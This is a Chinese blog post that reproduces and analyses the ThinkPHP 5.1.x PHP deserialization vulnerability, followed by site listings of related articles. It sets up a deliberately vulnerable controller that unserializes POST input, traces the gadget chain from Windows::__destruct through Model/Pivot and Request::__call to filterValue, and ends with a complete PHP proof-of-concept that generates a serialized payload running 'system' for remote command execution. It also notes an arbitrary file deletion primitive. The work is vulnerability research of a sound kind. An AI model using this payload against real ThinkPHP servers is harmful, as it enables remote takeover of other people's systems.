Thinkphp-v5.1.x反序列化漏洞复现分析

最新推荐文章于 2024-06-16 19:36:15 发布
最新推荐文章于 2024-06-16 19:36:15 发布
阅读量3k 收藏 1
点赞数 2
分类专栏: 笔记 文章标签: 安全 php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45678034/article/details/122493910
版权

环境搭建

使用 composer下载项目

composer create-project topthink/think=5.1.37 v5.1.37

配置控制器

<?php
namespace app\index\controller;
class unserialize{
    public function kb(){
        if(isset($_POST['unserialize'])){
            $a = $_POST['unserialize'];
            @unserialize(urldecode($a));
        }
        highlight_file(__FILE__);
        return '薇尔莉特yyds';
    }
}
?>

配置路由

return [
    'unserialize'=>'index/unserialize/kb',
];

访问unserialize

在这里插入图片描述

反序列化链分析

漏洞链的起点位于

library\think\process\pipes\Windows.php 的  __destruct()

    public function __destruct()
    {
        $this->close();
        $this->removeFiles();
    }

跟进removeFiles

    private function removeFiles()
    {
        foreach ($this->files as $filename) {
            if (file_exists($filename)) {
                @unlink($filename);
            }
        }
        $this->files = [];

$this->files是个数组 将值循环给到filename,判断文件是否存在,然后将它删除,这里便存在一个任意文件删除漏洞,poc简单自行编写,继续跟进反序列化链

在这里插入图片描述
传进来的参数是字符串,如果传进来是个对象的话,那么便会调用对象的__toString方法
全局查找一个__toString方法
thinkphp\library\think\model\concern\Conversion.php

    public function __toString()
    {
        return $this->toJson();
    }

跟进toJson

    public function toJson($options = JSON_UNESCAPED_UNICODE)
    {
        return json_encode($this->toArray(), $options);
    }

跟进toArray

public function toArray()
    {
    ***
        // 追加属性(必须定义获取器)
        if (!empty($this->append)) {
            foreach ($this->append as $key => $name) {
                if (is_array($name)) {
                    // 追加关联对象属性
                    $relation = $this->getRelation($key);

                    if (!$relation) {
                        $relation = $this->getAttr($key);
                        if ($relation) {
                            $relation->visible($name);
                        }
                    }
   ***
    }

关键代码就是上面这一段的 $relation->visible( $name); 对象可控参数也可控,方法名不可控,让他调用__call方法即可,if判断中的relation得为假才能进入

跟进getRelation($key)
getRelation在trait RelationShip类中

    public function getRelation($name = null)
    {
        if (is_null($name)) {
            return $this->relation;
        } elseif (array_key_exists($name, $this->relation)) {
            return $this->relation[$name];
        }
        return;
    }

这里我们让他返回空即可,跟进getAttr($key)
getAttr在trait Attribute类中

public function getAttr($name, &$item = null)
    {
        try {
            $notFound = false;
            $value    = $this->getData($name);
        } catch (InvalidArgumentException $e) {
            $notFound = true;
            $value    = null;
        }

        // 检测属性获取器
        $fieldName = Loader::parseName($name);
        $method    = 'get' . Loader::parseName($name, 1) . 'Attr';

        if (isset($this->withAttr[$fieldName])) {
            if ($notFound && $relation = $this->isRelationAttr($name)) {
                $modelRelation = $this->$relation();
                $value         = $this->getRelationData($modelRelation);
            }

            $closure = $this->withAttr[$fieldName];
            $value   = $closure($value, $this->data);
        } elseif (method_exists($this, $method)) {
            if ($notFound && $relation = $this->isRelationAttr($name)) {
                $modelRelation = $this->$relation();
                $value         = $this->getRelationData($modelRelation);
            }

            $value = $this->$method($value, $this->data);
        } elseif (isset($this->type[$name])) {
            // 类型转换
            $value = $this->readTransform($value, $this->type[$name]);
        } elseif ($this->autoWriteTimestamp && in_array($name, [$this->createTime, $this->updateTime])) {
            if (is_string($this->autoWriteTimestamp) && in_array(strtolower($this->autoWriteTimestamp), [
                'datetime',
                'date',
                'timestamp',
            ])) {
                $value = $this->formatDateTime($this->dateFormat, $value);
            } else {
                $value = $this->formatDateTime($this->dateFormat, $value, true);
            }
        } elseif ($notFound) {
            $value = $this->getRelationAttribute($name, $item);
        }

        return $value;
    }

最终返回一个value,跟进getData($name),此时的name是上面的append的健

    public function getData($name = null)
    {
        if (is_null($name)) {
            return $this->data;
        } elseif (array_key_exists($name, $this->data)) {
            return $this->data[$name];
        } elseif (array_key_exists($name, $this->relation)) {
            return $this->relation[$name];
        }
        throw new InvalidArgumentException('property not exists:' . static::class . '->' . $name);
    }

到这里我们就可以在第二个条件或第三个条件让他返回一个对象了,这时去找一下让它调用哪个对象的__call方法,让它调用Request的__call方法即可,虽说参数不可控,但是调用的函数可控

    public function __call($method, $args)
    {
        if (array_key_exists($method, $this->hook)) {
            array_unshift($args, $this);
            return call_user_func_array($this->hook[$method], $args);
        }

        throw new Exception('method not exists:' . static::class . '->' . $method);
    }
小总结

先是调用了trait Conversion的__toString()->toJson()->toArray(),再到trait RelationShip的getRelation,再到trait Attribute的getAttr(),再到getData()返回一个Request对象,所以先得找一个使用了这3个trait类的类
在这里插入图片描述
找到了Model但他是个抽象类,再去找找谁继承了它
在这里插入图片描述
找到了Pivot,这是可以构造一部分poc了

<?php
namespace think{
    class Request{
    }
}

namespace think{
    abstract class Model
    {
        protected $append = [];
        private $data = [];
        public function __construct(){
            $this->data=['kb'=>new Request()];
            $this->append=['kb'=>['hello','word']];
        }
    }
}

namespace think\model{

    use think\Model;

    class Pivot extends Model
    {

    }
}

namespace think\process\pipes{
    use think\model\Pivot;
    class Windows
    {
        private $files = [];
        public function __construct(){
            $this->files[]=new Pivot();
        }
    }
}

namespace{
    use think\process\pipes\Windows;
    echo urlencode(serialize(new Windows()));
}

然后去跟一下Request的__call方法

    public function __call($method, $args)
    {
        if (array_key_exists($method, $this->hook)) {
            array_unshift($args, $this);
            return call_user_func_array($this->hook[$method], $args);
        }

        throw new Exception('method not exists:' . static::class . '->' . $method);
    }

函数可控,参数不可控,而且这里没有直接执行命令的地方,得去找一个能执行命令的函数

在Thinkphp的Request类中还有一个filter功能,事实上Thinkphp多个RCE都与这个功能有关。我们可以尝试覆盖filter的方法去执行代码。

private function filterValue(&$value, $key, $filters)
    {
        $default = array_pop($filters);

        foreach ($filters as $filter) {
            if (is_callable($filter)) {
                // 调用函数或者方法过滤
                $value = call_user_func($filter, $value);

这里有代码执行的地方但是方法与函数都不可控,这时去找一个调用它的方法,来让他的参数可控。

public function input($data = [], $name = '', $default = null, $filter = '')
    {
        if (false === $name) {
            // 获取原始数据
            return $data;
        }

        $name = (string) $name;
        if ('' != $name) {
            // 解析name
            if (strpos($name, '/')) {
                list($name, $type) = explode('/', $name);
            }

            $data = $this->getData($data, $name);

            if (is_null($data)) {
                return $default;
            }

            if (is_object($data)) {
                return $data;
            }
        }

        // 解析过滤器
        $filter = $this->getFilter($filter, $default);

        if (is_array($data)) {
            array_walk_recursive($data, [$this, 'filterValue'], $filter);
            if (version_compare(PHP_VERSION, '7.1.0', '<')) {
                // 恢复PHP版本低于 7.1 时 array_walk_recursive 中消耗的内部指针
                $this->arrayReset($data);
            }
        } else {
            $this->filterValue($data, $name, $filter);
        }

        if (isset($type) && $data !== $default) {
            // 强制类型转换
            $this->typeCast($data, $type);
        }

        return $data;
    }

重要的是这一段
在这里插入图片描述
进到这里的话得让$name为空
跟进一下getFilter()

    protected function getFilter($filter, $default)
    {
        if (is_null($filter)) {
            $filter = [];
        } else {
            $filter = $filter ?: $this->filter;
            if (is_string($filter) && false === strpos($filter, '/')) {
                $filter = explode(',', $filter);
            } else {
                $filter = (array) $filter;
            }
        }

        $filter[] = $default;

        return $filter;
    }

相当于$filter = $this->filter;
现在回调方法可控了但是参数不可控,找一下调用input方法的方法

    public function param($name = '', $default = null, $filter = '')
    {
        if (!$this->mergeParam) {
            $method = $this->method(true);

            // 自动获取请求变量
            switch ($method) {
                case 'POST':
                    $vars = $this->post(false);
                    break;
                case 'PUT':
                case 'DELETE':
                case 'PATCH':
                    $vars = $this->put(false);
                    break;
                default:
                    $vars = [];
            }

            // 当前请求参数和URL地址中的参数合并
            $this->param = array_merge($this->param, $this->get(false), $vars, $this->route(false));

            $this->mergeParam = true;
        }

        if (true === $name) {
            // 获取包含文件上传信息的数组
            $file = $this->file();
            $data = is_array($file) ? array_merge($this->param, $file) : $this->param;

            return $this->input($data, '', $default, $filter);
        }

        return $this->input($this->param, $name, $default, $filter);

关键是这两句,第一句让我们参数可控,第二句调用input,可以通过两种方式给参数赋值,第一个是给$this->param赋值,第二个是通过get()方法调用_GET自动获取值

$this->param = array_merge($this->param, $this->get(false), $vars, $this->route(false));

return $this->input($this->param, $name, $default, $filter);

但是此时$name依然不可控,继续查找调用param()方法的方法

    public function isAjax($ajax = false)
    {
        $value  = $this->server('HTTP_X_REQUESTED_WITH');
        $result = 'xmlhttprequest' == strtolower($value) ? true : false;

        if (true === $ajax) {
            return $result;
        }

        $result           = $this->param($this->config['var_ajax']) ? true : $result;
        $this->mergeParam = false;
        return $result;
    }

这里调用了param()而且参数可控,所以只需要让Request的__call()方法调用自己的isAjax方法即可。
构造完整poc:

<?php
namespace think{
    abstract class Model
    {
        protected $append = [];
        private $data = [];
        public function __construct(){
            $this->data=['kb'=>new Request()];
            $this->append=['kb'=>['hello','word']];
        }
    }
    class Request{
        protected $param=[];
        protected $hook=[];
        protected $filter;
        protected $config=[];
        function __construct(){
            $this->filter = "system";
            $this->config = ["var_ajax"=>''];
            $this->hook = ["visible"=>[$this,"isAjax"]];
        }
    }
}

namespace think\model{
    use think\Model;
    class Pivot extends Model
    {
    }
}

namespace think\process\pipes{
    use think\model\Pivot;
    class Windows
    {
        private $files;
        public function __construct(){
            $this->files=[new Pivot()];
        }
    }
}

namespace{
    use think\process\pipes\Windows;
    echo urlencode(serialize(new Windows()));
}

在这里插入图片描述
参考链接:
Thinkphp5.1 反序列化漏洞复现

Thinkphp 反序列化利用链深入分析

._空白_.
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
thinkphp5.1完整版
07-26
thinkphp5.1完整版代码,直接运行代码不需要在git之类的了
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
### ThinkPHP 5.0.x/5.1.x 变量覆盖远程代码执行(RCE)漏洞分析 #### 漏洞概述 ThinkPHP 5.0.x 和 5.1.x 版本中存在一个变量覆盖导致的远程代码执行(RCE)漏洞。该漏洞利用者可以通过对特定HTTP请求参数的精心...
Thinkphp5.1.x反序列化漏洞复现
shinygod的博客
10-05 1230
Thinkphp5.1.x反序列化漏洞复现
网络安全实战:剖析ThinkPHP 5.1.X反序列化漏洞
weixin_43822401的博客
06-16 717
ThinkPHP作为广泛使用的PHP开发框架,在5.1.X版本中存在一个严重的反序列化漏洞。该漏洞允许攻击者通过构造特定的序列化字符串,实现在服务器上执行任意代码,从而可能导致数据泄露、服务中断等安全事件。
ThinkPHP5.1反序列化漏洞
Sentiment的博客
05-20 5313
前言 在了解完tp的一些规则后,开始本篇反序列化漏洞复现学习 安装 源码下载链接 没有composer可以去下载,傻瓜式安装即可Composer (getcomposer.org) 使用composer安装 composer create-project topthink/think=5.1.* tp 启动服务 cd tp php think run 然后就可以在浏览器中访问 http://localhost:8000 搭建成功 反序列化分析 反序列化利用点肯定要是从__destruct()开始
ThinkPHP 5.1.X 反序列化漏洞:深入分析与利用技巧
weixin_43822401的博客
06-16 475
Web应用开发中,框架的安全性至关重要。ThinkPHP作为广泛使用的PHP开发框架,其版本5.1.X中存在一个反序列化漏洞,允许攻击者执行任意代码。本文将深入分析漏洞的原理、利用方法,并提供相应的防护措施。
Thinkphp5.1反序列化漏洞复现
qq_63928796的博客
11-02 1181
最近打ctf总是遇见一些cve,虽然能找到payload但光打payload属实无趣,所以简单看了一点代码审计和thinkphp开发规则后开始跟几个thinkphp漏洞
ThinkPHP V6.0.12LTS反序列化漏洞复现源码
最新发布
07-29
ThinkPHP 是一个流行的 PHP 框架,其 6.0.12 LTS 版本中曾经存在一个反序列化漏洞。这类漏洞可能会被恶意攻击者利用来执行任意代码,危害系统安全
thinkphp-queue 笔记.md
05-09
thinkphp-queue 笔记.md
thinkphp v5.1.0
11-27
thinkphp v5.1.0官方最新版是一款php语言的开发框架,新版本完善缓存驱动,改进数据库查询,为云平台提供新的支持,需要的用户赶快来下载吧。
基于Thinkphp5.1.X的博客网站设计源码
04-07
Thinkphp5.1.X博客网站源码:包含580个文件,其中254个PHP文件,用于实现网站的后端逻辑;97个GIF图像,用于美化界面;58个JavaScript文件,用于添加动态交互;44个CSS文件,用于控制网站样式;43个PNG图像,用于...
毕设&课设&项目&实训-基于Thinkphp 5.1.x开发实时同步DIY官网.zip
02-03
基于Thinkphp 5.1.x开发实时同步DIY官网设计应用,无需要下载直接在线同步应用更新应用。DIY官网是一款的可视化Web应用开发和运行平台。基于浏览器的集成开发环境,可视化和智能化的设计,能轻松完成身微信小程序和...
fastadmin-thinkphp5.1:ThinkPHP 5.1.38 LTS的fastadmin
05-29
FastAdmin 完全升级 thinkphp5.1 fastadmin: 1.0.0.20190418_beta thinkphp: 5.1.38 LTS 安装使用 环境要求 PHP >= PHP7.1 Mysql >= 5.5.0 (需支持innodb引擎) Apache 或 Nginx PDO PHP Extension MBstring ...
Thinkphp 5.1
ylnzzl的博客
08-22 546
简而言之 TP5.1要求PHP V>5.6.0。 取消了系统路径的常量定义,配置文件从类库目录里独立出来,配置参数全是二级配置,配置名称区分大小写【建议统一用小写】。 所有应用从入口文件开始,public目录为可访问目录。linux环境下面,runtime目录权限为777。 可以对增删改查方法设置对应的回调函数【before_*,after_*】。 TP5.1明确了容器【think\Container】的概念,容器可以理解为是将一些类的实例化对象【如常用的核心类库对象】保存进来,并给予一
ThinkPHP5.1.x 反序列化
LYJ20010728的博客
08-23 875
ThinkPHP5.1.x 反序列化补充知识PHP反序列化原理在PHP反序列化的过程中会自动执行一些魔术方法反序列化的常见起点反序列化的常见中间跳板反序列化的常见终点Phar反序列化原理以及特征漏洞环境漏洞分析寻找反序列化的起始点寻找反序列化的中间跳板寻找反序列化代码执行点构造反序列化利用链漏洞利用条件 补充知识 PHP反序列化原理 PHP反序列化就是在读取一段字符串然后将字符串反序列化php对象 在PHP反序列化的过程中会自动执行一些魔术方法 方法名 调用条件 __call 调用
ThinkPHP v5.1.x POP 链分析
蚁景网安学院
10-12 854
前段时间网上爆出 ThinkPHP 5.1.x 的 POP 链,早就想分析一下,正好最近有空,就记录一下吧环境:MacOS 10.13MAMAP Prophp 7.0.33 + xdeb...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值